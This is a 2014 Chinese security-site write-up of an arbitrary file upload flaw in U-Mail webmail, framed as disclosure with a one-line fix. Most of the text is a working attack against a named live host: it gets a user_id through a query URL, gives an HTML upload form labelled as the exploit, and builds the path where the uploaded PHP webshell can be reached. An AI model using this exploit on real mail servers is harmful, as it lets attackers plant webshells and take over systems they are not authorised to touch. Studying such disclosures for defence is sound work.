关于冰盾 | 使用条款 | 网站地图
 
U-Mail任意文件上传漏洞一枚及修复
U-Mail任意文件上传漏洞一枚及修复
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-12-15
 
先登录官方测试站点:
 




 
 
这里登录的账号为:mailtest3721
 
再获取当前登录用户的user_id
 
http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721
 
这里mailtest3721对应的user_id为:78609
 
 
html exp:
 
1
2
3
4
5
6
7
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 
<FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>
 
上传文件:<input type="file" name="Filedata" size="30">
 
<INPUT type=submit value=上传 name=Submit>

 

 
上传后获取"file_id":"13995534500"
 
shell地址:
 
http://mail.comingchina.com/webmail/client/cache/{user_id}/{file_id}.php
 
这里是:
 
http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php
 
 
修复方案:
禁止上传php等脚本文件。
 

 
最新内容:
如何评价XSS在黑客攻防中的地位或重要性?[2014-12-15]
黑客攻防之浅谈WAP网站安全[2014-12-15]
轻松解决盘符打不开的病毒[2014-12-15]
U盘Autorun.inf文件病毒防范技巧[2014-12-15]
不要把秘密留在网络上[2014-12-15]
教你封杀网络木马病毒十大绝招[2014-12-15]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195